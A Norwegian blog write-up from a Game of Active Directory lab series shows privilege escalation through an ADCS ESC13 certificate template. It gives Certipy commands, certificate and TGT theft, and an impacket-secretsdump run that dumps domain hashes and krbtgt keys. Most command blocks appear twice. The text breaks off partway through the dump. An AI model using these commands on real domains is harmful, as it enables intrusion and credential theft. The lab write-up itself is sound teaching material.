GoAD Write-up – Persistence, Escalation & Lateral Movement – Finale

Game of Active Directory del 3.4 – Persistence Privilege escalation & Lateral Movement – finale.

Forord: Denne bloggserien viser reelle metoder angripere bruker for å bevege seg inn i, og ta over et AD miljø. All denne informasjonen er allerede offentlig tilgjengelig, og deles ikke for å gi grunnkurs i nettkriminalitet, men for å spre kunnskap om hvorfor vi må beskytte oss. Du må kun benytte disse verktøyene, metodene og prosedyrene i miljøer der du har fått eksplisitt samtykke av eier til å gjøre dette.

I forrige innlegg avrundet vi ved å vise hvordan gjenbruk av passord gav oss en mulighet til å trenge inn via mssql tjenesten på braavos.essos.local og dermed en fot på innsiden av essos.local skogen. I dette innlegget skal vi ta for oss eskalering av privilegier og lateral bevegelse over til meereen.essos.local, hvor vi skal legge oss selv til som Enterprise Admin bare for å vise at det er mulig. Hovedfokuset i dette innlegget vil være sårbare konfigurasjoner i Active Directory Certificate Services.

Angrepsbaner

Mange har dårlig kontroll på Active Directory Certificate Services, og det er ikke så rart , det er et komplekst tema de færreste lærer noe særlig om med mindre de spesialiserer seg på det.

I denne artikkelen ønsker jeg å demonstrere noen forskjellige svake konfigurasjoner. Vi skal ikke gå gjennom alle, men noen få, fordi det er viktig å understreke at det finnes flere problematiske konfigurasjoner med potensielt alvorlige konsekvenser.

Angrepsbane #1 – ESC13

Jeg ba Bloodhound finne en vei fra [email protected] brukeren til meereen.essos.local objektet, og fikk følgende graf:

Utnyttelse av ADCS ESC13 sårbarheten gir i dette tilfellet medlemskap i GREATMASTER gruppen som er admin på MEEREEN DCen i essos.local

Denne sertifikatmalen er konfigurert for labben med sårbarheten kalt “ESC13”. Den er konfigurert for klient-autentisering, og den gir medlemskap i en gruppe. I denne labben er gruppen den er koblet til “GREATMASTER”, som har administrative privilegier på domenekontrolleren MEEREEN.

Fordi SQL_SVC brukeren vi allerede har brukernavn og passord til er medlem av Domain Users i essos.local, og Domain Users har rett til å etterspørre sertifikatet ESC13, så kan SQL_SVC i teorien legge seg selv til som lokaladministrator på domenekontrolleren.

Rekognosering

Vi gjør først litt rekognosering fra angrepsmaskinen vår, med et verktøy som heter Certipy. Vi benytter “Find” funksjonaliteten i Certipy for å autentisere oss mot sertifikattjenestene i Essos med sql_svc brukeren, og ser etter sårbare sertifikatmaler, som f.eks den ESC13 malen vi har funnet via Bloodhound. Dette gjør vi fordi vi ønsker litt mer informasjon om hvordan ESC13 malen er satt opp, men også for å finne andre interessante maler vi kan undersøke, og det er nyttig å vise at Bloodhound ikke er eneste verktøyet vi kan bruke for å enumerere sertifikatbaserte sårbarheter i et AD miljø.

certipy find -u 'sql_svc@essos.local' -p 'YouWillNotKerboroast1ngMeeeeee' -dc-ip '10.3.2.12' -text -enabled
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 40 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Finding issuance policies
[*] Found 27 issuance policies
[*] Found 7 OIDs linked to templates
[*] Retrieving CA configuration for 'ESSOS-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'ESSOS-CA'
[*] Checking web enrollment for CA 'ESSOS-CA' @ 'braavos.essos.local'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Saving text output to '20251007075641_Certipy.txt'
[*] Wrote text output to '20251007075641_Certipy.txt'

certipy find -u '[email protected]' -p 'YouWillNotKerboroast1ngMeeeeee' -dc-ip '10.3.2.12' -text -enabled
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 40 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Finding issuance policies
[*] Found 27 issuance policies
[*] Found 7 OIDs linked to templates
[*] Retrieving CA configuration for 'ESSOS-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'ESSOS-CA'
[*] Checking web enrollment for CA 'ESSOS-CA' @ 'braavos.essos.local'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Saving text output to '20251007075641_Certipy.txt'
[*] Wrote text output to '20251007075641_Certipy.txt'

Certipy gir oss bl.a. svært interessant informasjon om selve sertifikattjeneren.

Certificate Authorities
  0
    CA Name                             : ESSOS-CA
    DNS Name                            : braavos.essos.local
    Certificate Subject                 : CN=ESSOS-CA, DC=essos, DC=local
    Certificate Serial Number           : 1820E2DB695D39AA41D26F903197238F
    Certificate Validity Start          : 2025-09-11 19:35:45+00:00
    Certificate Validity End            : 2030-09-11 19:45:44+00:00
    Web Enrollment
      HTTP
        Enabled                         : True
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Enabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Disabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : ESSOS.LOCAL\Administrators
      Access Rights
        ManageCa                        : ESSOS.LOCAL\Administrators
                                          ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        ManageCertificates              : ESSOS.LOCAL\Administrators
                                          ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Enroll                          : ESSOS.LOCAL\Authenticated Users
    [!] Vulnerabilities
      ESC6                              : Enrollee can specify SAN.
      ESC8                              : Web Enrollment is enabled over HTTP.
      ESC11                             : Encryption is not enforced for ICPR (RPC) requests.
    [*] Remarks
      ESC6                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

Certificate Authorities
  0
    CA Name                             : ESSOS-CA
    DNS Name                            : braavos.essos.local
    Certificate Subject                 : CN=ESSOS-CA, DC=essos, DC=local
    Certificate Serial Number           : 1820E2DB695D39AA41D26F903197238F
    Certificate Validity Start          : 2025-09-11 19:35:45+00:00
    Certificate Validity End            : 2030-09-11 19:45:44+00:00
    Web Enrollment
      HTTP
        Enabled                         : True
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Enabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Disabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : ESSOS.LOCAL\Administrators
      Access Rights
        ManageCa                        : ESSOS.LOCAL\Administrators
                                          ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        ManageCertificates              : ESSOS.LOCAL\Administrators
                                          ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Enterprise Admins
        Enroll                          : ESSOS.LOCAL\Authenticated Users
    [!] Vulnerabilities
      ESC6                              : Enrollee can specify SAN.
      ESC8                              : Web Enrollment is enabled over HTTP.
      ESC11                             : Encryption is not enforced for ICPR (RPC) requests.
    [*] Remarks
      ESC6                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

Vi ser HTTP Web Enrollment er slått på, som gjør selve sertifikattjeneren sårbar for NTLM relay angrep, ettersom HTTP er en klartekstprotokoll uten signering. Denne sårbarheten er også poengtert som en sårbarhet kalt ESC8, som Certipy også trekker oppmerksomheten vår mot.

Vi får også detaljer om hver enkelt sertifikatmal, som f.eks ESC13 malen her:

Certificate Templates
  0
    Template Name                       : ESC13
    Display Name                        : ESC13
    Certificate Authorities             : ESSOS-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-09-11T18:50:29+00:00
    Template Last Modified              : 2025-09-12T14:45:42+00:00
    Issuance Policies                   : 1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.81485093.84030427
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.53016532.91256354
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.11103715.67862760
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.46738277.16251393
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.59906215.20214076
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.54309475.61286128
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.67609022.78233752
    Linked Groups                       : CN=greatmaster,CN=Users,DC=essos,DC=local
    Permissions
      Enrollment Permissions
        Enrollment Rights               : ESSOS.LOCAL\Domain Users
      Object Control Permissions
        Owner                           : ESSOS.LOCAL\Enterprise Admins
        Full Control Principals         : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Owner Principals          : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Dacl Principals           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
    [+] User Enrollable Principals      : ESSOS.LOCAL\Domain Users
    [!] Vulnerabilities
      ESC13                             : Template allows client authentication and issuance policy is linked to group 'CN=greatmaster,CN=Users,DC=essos,DC=local'.

Certificate Templates
  0
    Template Name                       : ESC13
    Display Name                        : ESC13
    Certificate Authorities             : ESSOS-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-09-11T18:50:29+00:00
    Template Last Modified              : 2025-09-12T14:45:42+00:00
    Issuance Policies                   : 1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.81485093.84030427
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.53016532.91256354
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.11103715.67862760
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.46738277.16251393
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.59906215.20214076
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.54309475.61286128
                                          1.3.6.1.4.1.311.21.8.11207162.16194168.7618993.8087878.16471814.222.67609022.78233752
    Linked Groups                       : CN=greatmaster,CN=Users,DC=essos,DC=local
    Permissions
      Enrollment Permissions
        Enrollment Rights               : ESSOS.LOCAL\Domain Users
      Object Control Permissions
        Owner                           : ESSOS.LOCAL\Enterprise Admins
        Full Control Principals         : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Owner Principals          : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Dacl Principals           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
    [+] User Enrollable Principals      : ESSOS.LOCAL\Domain Users
    [!] Vulnerabilities
      ESC13                             : Template allows client authentication and issuance policy is linked to group 'CN=greatmaster,CN=Users,DC=essos,DC=local'.

ESC13 malen tillater autentisering, og er linket til greatmaster gruppen i essos.local. Videre ser vi at “ESSOS.LOCAL\Domain Users” har enrollment rettigheter – altså at de kan etterspørre sertifikatet. Certipy har allerede sørget for at kun de aktive malene på sertifikattjenesten blir vist, så vi slipper å gå gjennom de som ikke kan brukes fordi de er avslått.

Vi etterspør ESC13 sertifikatet på vegne av sql_svc og identifiserer oss med riktig brukernavn og passord, mot riktig Certificate Authority i essos.local – som vi fant ut via Certipy find.

$ certipy req -u sql_svc@essos.local -p YouWillNotKerboroast1ngMeeeeee -ca ESSOS-CA -target braavos.essos.local -template ESC13
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'sql_svc@essos.local'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'sql_svc.pfx'
[*] Wrote certificate and private key to 'sql_svc.pfx'

$ certipy req -u [email protected] -p YouWillNotKerboroast1ngMeeeeee -ca ESSOS-CA -target braavos.essos.local -template ESC13
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'sql_svc.pfx'
[*] Wrote certificate and private key to 'sql_svc.pfx'

Så bruker vi igjen Certipy for å autentisere med vårt flunkende nye sertifikat mot Meereen for å etterspørre en TGT.

$ certipy auth -pfx sql_svc.pfx -dc-ip 10.3.2.12                                                                               
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'sql_svc@essos.local'
[*] Using principal: 'sql_svc@essos.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'sql_svc.ccache'
File 'sql_svc.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y  
[*] Wrote credential cache to 'sql_svc.ccache'
[*] Trying to retrieve NT hash for 'sql_svc'
[*] Got hash for 'sql_svc@essos.local': aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804

$ certipy auth -pfx sql_svc.pfx -dc-ip 10.3.2.12                                                                               
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: '[email protected]'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'sql_svc.ccache'
File 'sql_svc.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y  
[*] Wrote credential cache to 'sql_svc.ccache'
[*] Trying to retrieve NT hash for 'sql_svc'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804

Og så bruker vi f.eks impacket-secretsdump til å dumpe ut rubbel og bit med kredentialer fra meereen domenekontrolleren, med vår nye kerberos-billett.

$ impacket-secretsdump -k -no-pass meereen.essos.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x737a2a868489f8fc657ab97c16b317c6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
ESSOS\MEEREEN$:plain_password_hex:3cbe291fa44f4f677efab6f63aea18d67ed764bf6c21dd31a6a46dc2f3678e2a349171a06870f2d8f6cf6da118c3b7df70f6c98d8cfd53f6d1e0749804c7eb29e8b94ca24583c285aa6eda00b8887be30b9f1f3013239f6b2d4cdc1936fba7bdee3a783354b366022f18a3d6088695b25471c85381d848ab3eca05392cf5c6ee8fff461f03008b098f6b3784624f1cd8c5244c8dd2a4d1649ae38f5c8a3043c288ec5c2fa2c3df386010f363810cc73f9560e888667b71618d7e1bcc7cd284a54b6d74439f5562be482a9b0fc824e97a05287193363840c9498323df971f017132c4785350c4a65e2db7636364095ccf
ESSOS\MEEREEN$:aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0552276b93169601952221fddd9481e810ee5d50
dpapi_userkey:0xe4ab110d019233fc243d6bdb86fd66d06350caaf
[*] NL$KM 
 0000   D3 6B D5 FF 27 14 90 56  ED 90 A6 4C D5 18 FE 84   .k..'..V...L....
 0010   EC 69 09 33 E5 BE 27 F6  6E D7 DB E8 C7 31 5A 8B   .i.3..'.n....1Z.
 0020   53 C9 D6 EF B4 0E B2 A9  BF 9E C7 E1 29 ED A8 E5   S...........)...
 0030   10 E4 7D AF BF A5 86 E3  88 E5 20 2C 5A 5E 58 41   ..}....... ,Z^XA
NL$KM:d36bd5ff27149056ed90a64cd518fe84ec690933e5be27f66ed7dbe8c7315a8b53c9d6efb40eb2a9bf9ec7e129eda8e510e47dafbfa586e388e5202c5a5e5841
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3629557c8649a89c73b9785a8191a1d4:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
daenerys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
viserys.targaryen:1114:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
khal.drogo:1115:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
jorah.mormont:1116:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
missandei:1117:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec:::
drogon:1118:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d:::
BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:ffcdc8585135b0ad6991f47eb3a69767:::
gmsaDragon$:1120:aad3b435b51404eeaad3b435b51404ee:7fc360a05308304d8a75c8dbe3a5201c:::
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:5ed65337be5baf80e87377b374dc6913:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:284e2c4031851adcc0ca7dc0a821e0acfaa81e030e70571a38ffea50113ab8a5
krbtgt:aes128-cts-hmac-sha1-96:bdde69205c84534f0c7e9d85d512fe05
krbtgt:des-cbc-md5:0702c15d67c16445
daenerys.targaryen:aes256-cts-hmac-sha1-96:cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378
daenerys.targaryen:aes128-cts-hmac-sha1-96:eeb91a725e7c7d83bfc7970532f2b69c
daenerys.targaryen:des-cbc-md5:bc6ddf7ce60d29cd
viserys.targaryen:aes256-cts-hmac-sha1-96:b4124b8311d9d84ee45455bccbc48a108d366d5887b35428075b644e6724c96e
viserys.targaryen:aes128-cts-hmac-sha1-96:4b34e2537da4f1ac2d16135a5cb9bd3e
viserys.targaryen:des-cbc-md5:70528fa13bc1f2a1
khal.drogo:aes256-cts-hmac-sha1-96:2ef916a78335b11da896216ad6a4f3b1fd6276938d14070444900a75e5bf7eb4
khal.drogo:aes128-cts-hmac-sha1-96:7d76da251df8d5cec9bf3732e1f6c1ac
khal.drogo:des-cbc-md5:b5ec4c1032ef020d
jorah.mormont:aes256-cts-hmac-sha1-96:286398f9a9317f08acd3323e5cef90f9e84628c43597850e22d69c8402a26ece
jorah.mormont:aes128-cts-hmac-sha1-96:896e68f8c9ca6c608d3feb051f0de671
jorah.mormont:des-cbc-md5:b926916289464ffb
missandei:aes256-cts-hmac-sha1-96:41d08ceba69dde0e8f7de8936b3e1e48ee94f9635c855f398cd76262478ffe1c
missandei:aes128-cts-hmac-sha1-96:0a9a4343b11f3cce3b66a7f6c3d6377a
missandei:des-cbc-md5:54ec15a8c8e6f44f
drogon:aes256-cts-hmac-sha1-96:2f92317ed2d02a28a05e589095a92a8ec550b5655d45382fc877f9359e1b7fa1
drogon:aes128-cts-hmac-sha1-96:3968ac4efd4792d0acef565ac4158814
drogon:des-cbc-md5:bf1c85a7c8fdf237
sql_svc:aes256-cts-hmac-sha1-96:ca26951b04c2d410864366d048d7b9cbb252a810007368a1afcf54adaa1c0516
sql_svc:aes128-cts-hmac-sha1-96:dc0da2bdf6dc56423074a4fd8a8fa5f8
sql_svc:des-cbc-md5:91d6b0df31b52a3d
MEEREEN$:aes256-cts-hmac-sha1-96:627947a08303ffc008bb8984ac96f0c760fc3d2e5eb862b11edbd3533a10c768
MEEREEN$:aes128-cts-hmac-sha1-96:5c196a34f9258e725b2cbc62c72ff5c0
MEEREEN$:des-cbc-md5:2fe97f46b9253864
BRAAVOS$:aes256-cts-hmac-sha1-96:8d4c7ad755d68b03af90cf6a3961a6b594f8c9ea20b6d3ee0a97895d028d7f8e
BRAAVOS$:aes128-cts-hmac-sha1-96:82cbe868cf91352bd7cd6f6f50feb6f1
BRAAVOS$:des-cbc-md5:86dfd964d35e0ed9
gmsaDragon$:aes256-cts-hmac-sha1-96:ac426a3d054ae8e74d015db42a6b22cb05b1940072665f973601a38f44f11571
gmsaDragon$:aes128-cts-hmac-sha1-96:7c121eb9123f679c1904fde4a979dc8b
gmsaDragon$:des-cbc-md5:706bf845f4f2df1f
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:f9a4c9931fdcfb0562e22ea9274ba2be42a4bc311bcde8b91864cb44e7ee3fd6
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:b9a00bf0a4e7757c89878238b03a020d
SEVENKINGDOMS$:des-cbc-md5:94a4b63edfb04938
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

$ impacket-secretsdump -k -no-pass meereen.essos.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x737a2a868489f8fc657ab97c16b317c6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
ESSOS\MEEREEN$:plain_password_hex:3cbe291fa44f4f677efab6f63aea18d67ed764bf6c21dd31a6a46dc2f3678e2a349171a06870f2d8f6cf6da118c3b7df70f6c98d8cfd53f6d1e0749804c7eb29e8b94ca24583c285aa6eda00b8887be30b9f1f3013239f6b2d4cdc1936fba7bdee3a783354b366022f18a3d6088695b25471c85381d848ab3eca05392cf5c6ee8fff461f03008b098f6b3784624f1cd8c5244c8dd2a4d1649ae38f5c8a3043c288ec5c2fa2c3df386010f363810cc73f9560e888667b71618d7e1bcc7cd284a54b6d74439f5562be482a9b0fc824e97a05287193363840c9498323df971f017132c4785350c4a65e2db7636364095ccf
ESSOS\MEEREEN$:aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0552276b93169601952221fddd9481e810ee5d50
dpapi_userkey:0xe4ab110d019233fc243d6bdb86fd66d06350caaf
[*] NL$KM 
 0000   D3 6B D5 FF 27 14 90 56  ED 90 A6 4C D5 18 FE 84   .k..'..V...L....
 0010   EC 69 09 33 E5 BE 27 F6  6E D7 DB E8 C7 31 5A 8B   .i.3..'.n....1Z.
 0020   53 C9 D6 EF B4 0E B2 A9  BF 9E C7 E1 29 ED A8 E5   S...........)...
 0030   10 E4 7D AF BF A5 86 E3  88 E5 20 2C 5A 5E 58 41   ..}....... ,Z^XA
NL$KM:d36bd5ff27149056ed90a64cd518fe84ec690933e5be27f66ed7dbe8c7315a8b53c9d6efb40eb2a9bf9ec7e129eda8e510e47dafbfa586e388e5202c5a5e5841
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3629557c8649a89c73b9785a8191a1d4:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
daenerys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
viserys.targaryen:1114:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
khal.drogo:1115:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
jorah.mormont:1116:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
missandei:1117:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec:::
drogon:1118:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:8cc3c31495780c7e2e13055cb61d890d:::
BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:ffcdc8585135b0ad6991f47eb3a69767:::
gmsaDragon$:1120:aad3b435b51404eeaad3b435b51404ee:7fc360a05308304d8a75c8dbe3a5201c:::
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:5ed65337be5baf80e87377b374dc6913:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:284e2c4031851adcc0ca7dc0a821e0acfaa81e030e70571a38ffea50113ab8a5
krbtgt:aes128-cts-hmac-sha1-96:bdde69205c84534f0c7e9d85d512fe05
krbtgt:des-cbc-md5:0702c15d67c16445
daenerys.targaryen:aes256-cts-hmac-sha1-96:cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378
daenerys.targaryen:aes128-cts-hmac-sha1-96:eeb91a725e7c7d83bfc7970532f2b69c
daenerys.targaryen:des-cbc-md5:bc6ddf7ce60d29cd
viserys.targaryen:aes256-cts-hmac-sha1-96:b4124b8311d9d84ee45455bccbc48a108d366d5887b35428075b644e6724c96e
viserys.targaryen:aes128-cts-hmac-sha1-96:4b34e2537da4f1ac2d16135a5cb9bd3e
viserys.targaryen:des-cbc-md5:70528fa13bc1f2a1
khal.drogo:aes256-cts-hmac-sha1-96:2ef916a78335b11da896216ad6a4f3b1fd6276938d14070444900a75e5bf7eb4
khal.drogo:aes128-cts-hmac-sha1-96:7d76da251df8d5cec9bf3732e1f6c1ac
khal.drogo:des-cbc-md5:b5ec4c1032ef020d
jorah.mormont:aes256-cts-hmac-sha1-96:286398f9a9317f08acd3323e5cef90f9e84628c43597850e22d69c8402a26ece
jorah.mormont:aes128-cts-hmac-sha1-96:896e68f8c9ca6c608d3feb051f0de671
jorah.mormont:des-cbc-md5:b926916289464ffb
missandei:aes256-cts-hmac-sha1-96:41d08ceba69dde0e8f7de8936b3e1e48ee94f9635c855f398cd76262478ffe1c
missandei:aes128-cts-hmac-sha1-96:0a9a4343b11f3cce3b66a7f6c3d6377a
missandei:des-cbc-md5:54ec15a8c8e6f44f
drogon:aes256-cts-hmac-sha1-96:2f92317ed2d02a28a05e589095a92a8ec550b5655d45382fc877f9359e1b7fa1
drogon:aes128-cts-hmac-sha1-96:3968ac4efd4792d0acef565ac4158814
drogon:des-cbc-md5:bf1c85a7c8fdf237
sql_svc:aes256-cts-hmac-sha1-96:ca26951b04c2d410864366d048d7b9cbb252a810007368a1afcf54adaa1c0516
sql_svc:aes128-cts-hmac-sha1-96:dc0da2bdf6dc56423074a4fd8a8fa5f8
sql_svc:des-cbc-md5:91d6b0df31b52a3d
MEEREEN$:aes256-cts-hmac-sha1-96:627947a08303ffc008bb8984ac96f0c760fc3d2e5eb862b11edbd3533a10c768
MEEREEN$:aes128-cts-hmac-sha1-96:5c196a34f9258e725b2cbc62c72ff5c0
MEEREEN$:des-cbc-md5:2fe97f46b9253864
BRAAVOS$:aes256-cts-hmac-sha1-96:8d4c7ad755d68b03af90cf6a3961a6b594f8c9ea20b6d3ee0a97895d028d7f8e
BRAAVOS$:aes128-cts-hmac-sha1-96:82cbe868cf91352bd7cd6f6f50feb6f1
BRAAVOS$:des-cbc-md5:86dfd964d35e0ed9
gmsaDragon$:aes256-cts-hmac-sha1-96:ac426a3d054ae8e74d015db42a6b22cb05b1940072665f973601a38f44f11571
